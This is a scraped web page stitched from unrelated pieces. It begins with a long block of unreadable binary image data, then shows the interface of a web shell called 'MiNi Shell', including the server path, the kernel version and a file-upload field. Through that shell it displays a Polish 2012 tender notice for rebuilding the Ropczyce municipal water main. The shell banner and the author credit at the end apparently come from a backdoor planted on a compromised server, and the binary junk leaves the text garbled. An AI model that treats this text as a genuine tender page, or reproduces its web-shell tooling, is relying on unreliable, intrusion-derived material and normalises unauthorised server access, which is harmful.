JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120104/4279-N-2012.html

<p class="kh_header"><b>Ropczyce: Przebudowa wodociągu miejskiego w Ropczycach</b><br>
<b>Numer ogłoszenia: 4279 - 2012; data zamieszczenia: 04.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Usług Komunalnych Sp. z o.o. w Ropczycach , ul. Przemysłowa 12, 39-100 Ropczyce, woj. podkarpackie, tel. 017 2218296, faks 017 2218298.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pukropczyce.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa wodociągu miejskiego w Ropczycach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Przedmiot zamówienia obejmuje zaprojektowanie i wykonanie przebudowy istniejącego wodociągu miejskiego na 3 odcinkach obejmujących następujące rejony miasta:

2.1.1. Rejon ul. Wyszyńskiego - przebudowa istniejącego wodociągu wykonanego z rur stalowych fi 150mm,  długości 228,0m, na rury PE 100, SDR 17, fi 250 mm o długości 228,0m.
2.1.2. Rejon ul. Piłsudskiego - przebudowa istniejącego wodociągu wykonanego z rur stalowych fi 250mm, długości 1137,0m na rury PE 100, SDR 17, fi 280mm o długości 1137,0m.
2.1.3. Rejon ul. Mickiewicza - przebudowa istniejącego wodociągu wykonanego z rur stalowych fi 80mm, długości 960,0m na rury PE 100, SDR 17, fi 160mm o długości 960,0m.

Przebudowana sieć zostanie połączona z wodociągiem w systemie pierścieniowym. Uzbrojenie przebudowanego wodociągu stanowią zasuwy odcinające na sieci i przyłączach domowych, hydranty p-pożarowe nadziemne i podziemne o średnicy fi 80mm, oraz zawory odpowietrzająco - napowietrzające.

2.2. Modernizację uzdatniania wody pitnej w zbiornikach terenowych przy ul. Rataja przez montaż kompletnej sieci dezynfekcji wody z automatycznym pomiarem chloru wolnego w wodzie pitnej. Zakres robót obejmuje dostawę urządzeń, podłączenie do instalacji wodociągowej  oraz włączenie do istniejącego systemu automatyki i wizualizacji.

2.3. Wykonanie opomiarowania przepływu wody w 6 istniejących przepompowniach sieciowych oraz podłączenie ww przepompowni do istniejącego w przedsiębiorstwie systemu automatyki i wizualizacji pracy sieci wodociągowej. Przyjęte rozwiązania techniczne będą oparte na systemie łączności bezprzewodowej.

2.4. Wykonanie systemu radiowego odczytu wodomierzy z funkcją zdalnego przekazywania danych do systemu bilingowego (fakturującego) dla 100 punktów odczytowych wraz z dostawą niezbędnych urządzeń i oprogramowania.

3. Wykonanie przedmiotu zamówienia obejmuje w szczególności
3.1. opracowanie Dokumentacji Projektowej sporządzonej na podstawie programu funkcjonalno - użytkowego niezbędnej dla wykonania robót ( projekt budowlany, specyfikacja techniczna wykonania i odbioru robót, szczegółowy harmonogram rzeczowo - finansowy, przedmiar robót, kosztorys inwestorski),
3.1.1. skuteczne zgłoszenie właściwemu organowi zamiaru wykonania robót budowlanych polegających na przebudowie sieci wodociągowej wraz z uzyskaniem w imieniu Zamawiającego wymaganych odrębnymi przepisami pozwoleń, uzgodnień, opinii, decyzji
3.2. wykonanie robót budowlanych,
3.2.1. roboty ziemne
3.2.2. roboty rozbiórkowe i porządkowe
3.2.3.roboty montażowe
3.2.4. opracowanie dokumentacji powykonawczej niezbędnej do odbioru robót, a w szczególności wykonanie geodezyjnej inwentaryzacji powykonawczej przebudowanej sieci. 

4. Warunki
4.1. Pełen zakres i opis przedmiotu zamówienia określono w programie funkcjonalno - użytkowym. Program funkcjonalno - użytkowy jest załącznikiem do Specyfikacji Istotnych Warunków Zamówienia i jest dostępny do pobrania na stronie internetowej Zamawiającego www.pukropczyce.eu  lub w jego siedzibie.
4.1.1 Zamawiający wymaga załączenia do oferty ogólnego harmonogramu rzeczowo-finansowego opracowanego wg wzoru stanowiącego załącznik nr 7 do SIWZ
Zamawiający wymaga by ogólny harmonogram rzeczowo-finansowy spełniał poniższe wymogi:
Etap I - prace projektowe skutkujące rozpoczęciem robót budowalnych w terminie do 2012-05-28 .
Etap II - realizacja robót budowlanych przy ul. Mickiewicza  i ul. Wyszyńskiego w okresie od 2012-05-28 do  2012-09-28.
Etap III- realizacja robót budowlanych przy ul. Piłsudskiego od 2013-03-15 do 2013-08-30.
Etap IV dostawa i montaż opomiarowania wodociągu (montaż urządzeń do uzdatniania wody z automatycznym ciągłym pomiarem chloru wolnego w wodzie; montaż urządzeń do pomiaru i sterowania pracą przepompowni sieciowych; montaż urządzeń i oprogramowania komputerowego do zdalnego odczytu wodomierzy i przesyłu danych do programu finansowo -księgowego) w terminie 2012-10-01 do 2013-05-31.
Etap V - Planowana data zakończenia rzeczowej realizacji projektu (spisania protokołu odbioru końcowego)  - do 2013-08-30.
Postanowienia ogólnego harmonogramu rzeczowo-finansowego będą podstawą po wykonaniu dokumentacji projektowej przez Wykonawcę do sporządzenia szczegółowego harmonogramu rzeczowo -finansowego .
4.2. Do obowiązków Wykonawcy należy również wykonanie:
4.2.1. Kompleksowej obsługi geodezyjnej podczas realizacji inwestycji wraz z powykonawczą inwentaryzacją geodezyjną w 4 kpl.
4.2.2. Wykonanie dokumentacji powykonawczej 4 kpl. oraz w wersji elektronicznej 1 kpl.
4.2.3. Dokonania uzgodnień, uzyskania wszelkich opinii niezbędnych do wykonania przedmiotu zamówienia i poniesienia opłat z tym związanych.
4.2.4. Wykonania projektów organizacji ruchu, oraz niezbędnego oznakowania dróg jeżeli będą wymagane.
4.2.5. W przypadku zniszczeń urządzeń lub ich części w toku realizacji - naprawienia szkody lub doprowadzenia do stanu pierwotnego.
4.2.6. Przywrócenie do pierwotnego stanu terenu dróg i infrastruktury drogowej.
5. Warunki wykonawstwa:
5.1. wszelkie roboty należy wykonać zgodnie z wiedzą techniczną, zasadami sztuki budowlanej (ewentualne stosowanie przez Wykonawcę metod bezwykopowych tj. przewiertów sterowanych itp. nie będzie podstawą do ubiegania się Wykonawcy o dodatkową zapłatę - przyjmuje się, że ryzyko konieczności wyboru tej technologii robót jest skalkulowane w cenie ofertowej).
5.2. kierowanie robotami będzie sprawowane przez pracowników Wykonawcy posiadających odpowiednie uprawnienia budowlane.
5.3. zmiana osób wskazanych przez Wykonawcę do realizacji przedmiotu zamówienia w załączniku nr 5 wymaga każdorazowo akceptacji i zatwierdzenia Zamawiającego.
5.4. materiały zastosowane przy realizacji przedmiotu zamówienia muszą posiadać dokumenty poświadczające o dopuszczeniu tych materiałó1)w do obrotu i powszechnego stosowania w budownictwie ( certyfikat na znak bezpieczeństwa, certyfikat lub deklarację zgodności z PN lub AT, deklarację zgodności CE, Atest PZH- jeżeli jest wymagane).
5.5. wykonawca przy sporządzaniu dokumentacji technicznej oraz realizacji robót budowlanych winien uwzględnić stan istniejący tj. :
5.5.1.	w zakresie modernizacji uzdatniania wody pitnej : maksymalny godzinowy przepływ wody z ujęcia wynosi 140 m3h,
5.5.2.	w zakresie wykonanie opomiarowania przepływu wody w 6 istniejących przepompowniach sieciowych -  parametry istniejącego systemu monitoringu i wizualizacji  : komunikacja radiomodemowa, radiomodemy SATEL 3AS 869,protokół komunikacyjny MODBUS RTU, istniejący sterownik nadrzędny S7-300 SIEMENS, istniejący system wizualizacji SCADA: WIZCON,
5.5.3.	w zakresie wykonania systemu radiowego odczytu wodomierzy - istniejący zintegrowany system informatyczny KOMANDRES-M wdrożony przez ETOBRES
6. Zamawiający posiada prawo do dysponowania terenem na cele budowlane.
7. Zamawiający wymaga 36 miesięcy gwarancji i rękojmi na cały przedmiot zamówienie licząc od daty odbioru końcowego. Okres rękojmi za wady fizyczne, równy okresowi gwarancji, rozpoczyna się z dniem podpisania protokołu końcowego odbioru robót i przekazania do eksploatacji i upływa w dniu wygaśnięcia gwarancji.

8. Wykonawca przyjmie termin płatności 30 dni licząc od dnia doręczenia prawidłowo wystawionej faktury. Podstawą do wystawienia faktury jest każdorazowo podpisanie bezusterkowego protokołu odbioru..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 44.16.25.00-8, 45.11.00.00-1, 38.80.00.00-3, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagane wadium w wysokości 30 000,00 złotych  polskich PLN słownie: trzydzieści tysięcy złotych. Szczegółowe warunki opisane w Rozdziale VIII SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek, za spełniony jeżeli Wykonawca złoży oświadczenie w trybie art. 22 ust 1 (zał. Nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że wykonał w okresie
ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa zadania polegające na modernizacji lub wykonaniu sieci wodociągowej lub kanalizacyjnej o wartości co najmniej 1 200 000,00 zł.  każde.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ww warunek</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek, za spełniony jeżeli Wykonawca złoży oświadczenie w trybie art. 22 ust 1 (zał. Nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje dysponowanie
osobami i wskaże do uczestniczenia w wykonaniu niniejszego zamówienia wraz
z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia
niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie
czynności, oraz informacją o podstawie do dysponowania tymi osobami:
a) Kierownik budowy - 1 osoba - mająca, co najmniej 5 lat doświadczenia w pełnieniu funkcji kierownika budowy, posiadająca uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń wodociągowych  lub kanalizacyjnych - bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów.
b) Projektant -  1 osoba - mająca co najmniej 3 lata doświadczenia zawodowego w projektowaniu podobnych do niniejszego przedmiotu zamówienia, posiadająca uprawnienia budowlane do projektowania w specjalności w zakresie sieci,  instalacji i urządzeń wodociągowych lub kanalizacyjnych - bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów.

Osoby ww winny posiadać aktualny wpis na listę członków Okręgowej Izby Inżynierów Budownictwa , w oparciu o ustawę z dnia 6 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów i urbanistów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że:
1.5.1.posiada środki finansowe w wysokości co najmniej 1 000 000,00 złotych polskich (PLN) (słownie: jeden milion złotych 00 100 gr.) 
lub posiada zdolność kredytową w wysokości co najmniej 1 000 000,00 złotych polskich (PLN) (słownie: jeden milion złotych 00 100 gr.)
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ww warunek.
1.5.2. Jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę, co najmniej 500 000,00 złotych polskich (PLN) (słownie: pięćset tysięcy złotych 00 100 gr.)
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ww warunek</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>4.1. ofertę cenową - załącznik Nr 1 do SIWZ
	w przypadku składania oferty wspólnej należy złożyć jeden dokument
4.2. oświadczenie wg wzoru stanowiącego załącznik nr 1 do SIWZ wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców).
w przypadku składania oferty wspólnej należy złożyć jeden dokument
4.3. odpowiednie pełnomocnictwa
	tylko w sytuacjach określonych w rozdziale X pkt.1.6. zdanie 2 i pkt.1.7. niniejszej SIWZ
4.4. ogólny harmonogram rzeczowo-finansowy załącznik nr 7
4.5. parafowany projekt umowy. - załącznik Nr 8
w przypadku składania oferty wspólnej ww dokument składa pełnomocnik w imieniu  wykonawców składających ofertę wspólną</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3. Stosownie do przepisu art. 144 ustawy Pzp Zamawiający przewiduje możliwość  zmiany postanowień zawartej umowy, w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy w zakresie:
3.1. wydłużeniu okresu realizacji oraz zmiany kolejności i terminów wykonywania poszczególnych zakresów rzeczowych robót określonych w harmonogramie rzeczowo - finansowym, których potrzebę uzasadniają: 
3.1.1. podniesienie bezpieczeństwa wykonywania robót, 
3.1.2. usprawnienie realizacji robót, 
3.1.3. niekorzystne warunki atmosferyczne mające negatywny wpływ na jakość wykonywanych robót, 
3.1.4. opóźnienie dostawy materiałów lub urządzeń z przyczyn niezależnych od wykonawcy, 
3.1.5. zmiany terminów wykonania elementów zamówienia ( w szczególności dokumentacji projektowej) oraz terminu wykonania zamówienia z przyczyn niezawinionych przez Wykonawcę.
3.2. zmiany: nazwy, adresu  siedziby Zamawiającego  Wykonawcy oraz innych danych ujawnionych w rejestrach publicznych
3.3. zmiany osób występujących po stronie Zamawiającego  Wykonawcy
3.4. zmiana osób do kontaktów pomiędzy stronami.
3.5. zmianie ceny w przypadku ustawowej zmiany stawki podatku od towarów i usług. Cena ulegnie zmianie w ten sposób, że do ceny netto zostanie doliczony podatek VAT w wysokości wynikającej z przepisów. 
3.6. Zmiany w umowie, o których mowa w pkt. 3.1., mogą być dokonane pod warunkiem uzyskania zgody akceptacji Instytucji Zarządzającej Programem - Regionalny Program Operacyjny Województwa Podkarpackiego na lata 2007-2013. 
3.7. Zmiany umowy mogą być dokonywane na wniosek Zamawiającego lub Wykonawcy oraz winny być zaakceptowane przez obie strony umowy. 
3.8. Strona inicjująca zmianę uzasadnia potrzebę wprowadzenia zmian i określa jej wpływ na harmonogram robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pukropczyce.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Usług Komunalnych Sp z o.o. w Ropczycach, ul. Przemysłowa 12, 39-100 Ropczyce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2012 godzina 10:00, miejsce: Przedsiębiorstwo Usług Komunalnych Sp z o.o. w Ropczycach, ul. Przemysłowa 12, 39-100 Ropczyce, sekretariat pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com